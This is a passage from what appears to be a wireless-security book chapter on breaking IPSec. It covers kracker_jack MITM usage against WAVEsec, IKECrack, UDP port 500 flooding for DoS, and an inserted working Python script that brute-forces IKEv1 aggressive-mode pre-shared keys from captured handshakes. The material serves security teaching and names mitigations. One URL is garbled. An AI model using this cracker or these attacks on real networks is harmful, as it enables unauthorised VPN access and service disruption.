Chapter 8. Breaking Through

The WAVEsec mobile IPSec implementation is exploitable with kracker_jack from the AirJack suite:

    arhontus:~# ./kracker_jack
    Kracker Jack: Wireless 802.11(b) MITM proof of concept (with a bite).
    Usage: ./kracker_jack -b <bssid> -v <victim mac> -C <channel number> [ -c <channel number> ] -V <victims ip address> -s <server mac> -S <server ip address> [ -i <interface name> ] [ -I <interface name> ] [ -e <essid> ] -n <netmask> -B <broadcast address>
    -a: number of disassociation frames to send (defaults to 7)
    -t: number of deauthentication frames to send (defaults to 0)
    -b: bssid, the mac address of the access point (e.g., 00:de:ad:be:ef:00)
    -v: victim mac address
    -V: victim's ip address
    -s: wavesec server mac address
    -S: wavesec server ip address
    -B: network broadcast address
    -n: netmask address
    -c: channel number (1-14) that the access point is on, defaults to current
    -C: channel number (1-14) that we're going to move them to
    -i: the name of the AirJack interface to use (defaults to aj0)
    -I: the name of the interface to use (defaults to eth1)
    -e: the essid of the AP

If you want to find out more about how kracker_jack performs a man-in-the-middle attack against WAVEsec, see Abaddon's Black Hat Briefings presentation (bh2002.ppt).

As a less specific attack against IKE, you can try IKECrack, which works only against IKE phase 1 aggressive mode with HMAC-MD5. IKECrack (on the site) is a Perl script that takes a pcap-format file as input and brute-forces the PSK from the captured exchange. The attack is possible because in aggressive mode the responder's authentication hash, keyed through SKEYID from the pre-shared key, is sent in the clear, whereas in main mode it is sent encrypted; every other input to the hash (nonces, Diffie-Hellman public values, cookies, SA and ID payloads) is also visible on the wire, so candidate PSKs can be tested offline against the capture.

Finally, a desperate attacker can resort to DoS attacks against IPSec, perhaps to force the system administrator to bring the IPSec tunnel down for a while to determine what went wrong. If there is mission-critical traffic on the wireless link, the attacker's hope is that it will be allowed to pass unprotected while the network administrators are searching for the source of the IPSec tunnel failure.
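The computation behind the IKECrack attack, as an added example that is neither IKECrack's code nor the book's. It follows the key derivation of RFC 2409 (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), prf = HMAC over the negotiated hash). The nonces, DH values, cookies, SA and ID payload bodies and the wordlist are constructed sample data standing in for fields parsed out of a pcap; a real run would take them from the three captured aggressive-mode messages. The hash algorithm is a parameter so the same check covers HMAC-SHA1 SAs too, although IKECrack itself handles only MD5.

```python
"""Offline dictionary attack on an IKEv1 aggressive-mode pre-shared key.

Added example, not IKECrack's code and not from the book. It reproduces the
computation IKECrack relies on (RFC 2409, section 5):

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

where prf is HMAC keyed with the negotiated hash (HMAC-MD5 for IKECrack).
In aggressive mode the responder sends HASH_R unencrypted, so every input
is recoverable from a capture and candidate PSKs can be tested offline.
All packet field values below are constructed sample data, not a capture.
"""
import hashlib
import hmac
from dataclasses import dataclass, replace
from typing import Callable, Iterable, Optional


@dataclass(frozen=True)
class AggressiveExchange:
    """Fields a sniffer recovers from the three aggressive-mode messages."""
    ni: bytes       # initiator nonce body (Ni_b)
    nr: bytes       # responder nonce body (Nr_b)
    gxi: bytes      # initiator Diffie-Hellman public value (g^xi)
    gxr: bytes      # responder Diffie-Hellman public value (g^xr)
    cky_i: bytes    # initiator cookie, 8 bytes
    cky_r: bytes    # responder cookie, 8 bytes
    sai_b: bytes    # initiator SA payload body, generic header stripped
    idir_b: bytes   # responder ID payload body, generic header stripped
    hash_r: bytes   # HASH_R exactly as the responder sent it in the clear


def hash_r_for_psk(psk: bytes, x: AggressiveExchange,
                   hash_alg: Callable = hashlib.md5) -> bytes:
    """Compute HASH_R for a candidate PSK over the captured fields."""
    skeyid = hmac.new(psk, x.ni + x.nr, hash_alg).digest()
    data = x.gxr + x.gxi + x.cky_r + x.cky_i + x.sai_b + x.idir_b
    return hmac.new(skeyid, data, hash_alg).digest()


def crack_psk(x: AggressiveExchange, candidates: Iterable[bytes],
              hash_alg: Callable = hashlib.md5) -> Optional[bytes]:
    """Return the first candidate whose HASH_R matches the captured one."""
    for cand in candidates:
        if hmac.compare_digest(hash_r_for_psk(cand, x, hash_alg), x.hash_r):
            return cand
    return None


def build_sample_exchange(psk: bytes = b"letmein",
                          hash_alg: Callable = hashlib.md5) -> AggressiveExchange:
    """Constructed exchange: stands in for fields parsed out of a pcap."""
    x = AggressiveExchange(
        ni=bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0"),
        nr=bytes.fromhex("00112233445566778899aabbccddeeff"),
        gxi=bytes(range(1, 129)),            # 128-byte stand-in (group 2 size)
        gxr=bytes(range(128, 0, -1)),
        cky_i=bytes.fromhex("deadbeef00000001"),
        cky_r=bytes.fromhex("cafebabe00000002"),
        # constructed SA body: DOI=1, SIT_IDENTITY_ONLY, zeroed proposal bytes
        sai_b=bytes.fromhex("00000001") + bytes.fromhex("00000001") + bytes(28),
        # ID body: type 1 (IPV4_ADDR), protocol 0, port 0, address 192.168.0.1
        idir_b=bytes.fromhex("01000000") + bytes([192, 168, 0, 1]),
        hash_r=b"",
    )
    # The "responder" knows the PSK and produces the HASH_R seen on the wire.
    return replace(x, hash_r=hash_r_for_psk(psk, x, hash_alg))


if __name__ == "__main__":
    captured = build_sample_exchange()
    wordlist = [b"password", b"admin", b"letmein", b"wireless"]   # constructed
    print("recovered PSK:", crack_psk(captured, wordlist))
```

Each candidate costs two HMAC computations and nothing else, which is why a weak PSK on an aggressive-mode gateway falls to a wordlist in seconds; the fix is main mode (HASH_R encrypted), certificate authentication, or a PSK with real entropy.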
A cracker can try to stop ISAKMP for IPSec traffic with the H09_roper Ettercap plug-in (likely to work only against aggressive-mode IKE). Less specific attacks, such as flooding UDP port 500 on IKE-running hosts, can also be launched. There is a report ( http// 6N00G0A3FO.html) that continuous flooding of UDP port 500 on a Windows 2000 machine with large (more than 800 bytes) UDP packets can consume all available CPU cycles and lock up the targeted machine.

The Last Resort: Wireless DoS Attacks

Multiple DoS attacks against various wireless (and even wired) protocols, security protocols included, are mentioned elsewhere in the chapter. In many cases these attacks can be part of a sophisticated penetration plan and assist in social engineering, man-in-the-middle attempts, or stealing or cracking secret keys. However, a desperate attacker might launch a DoS attack to "compensate" for the effort spent on failed access attempts. Besides, wireless DoS attacks per se can be launched by competitors, for political reasons, out of curiosity, and so forth; the situation is no different from DoS attacks on public networks such as the Internet. Unfortunately, due to the nature of the RF medium and the design of the core 802.11 protocols, wireless networks cannot be protected against Layer 1 and certain Layer 2 DoS attacks. This is why, in our opinion, 802.11 links should not be used for mission-critical applications in theory. In the real world, there are cases when 802.11 is the only choice, and cases of system administrators or network designers being unaware or dismissive of the problem and going forward with the WLAN installation anyway. This is why you, as a security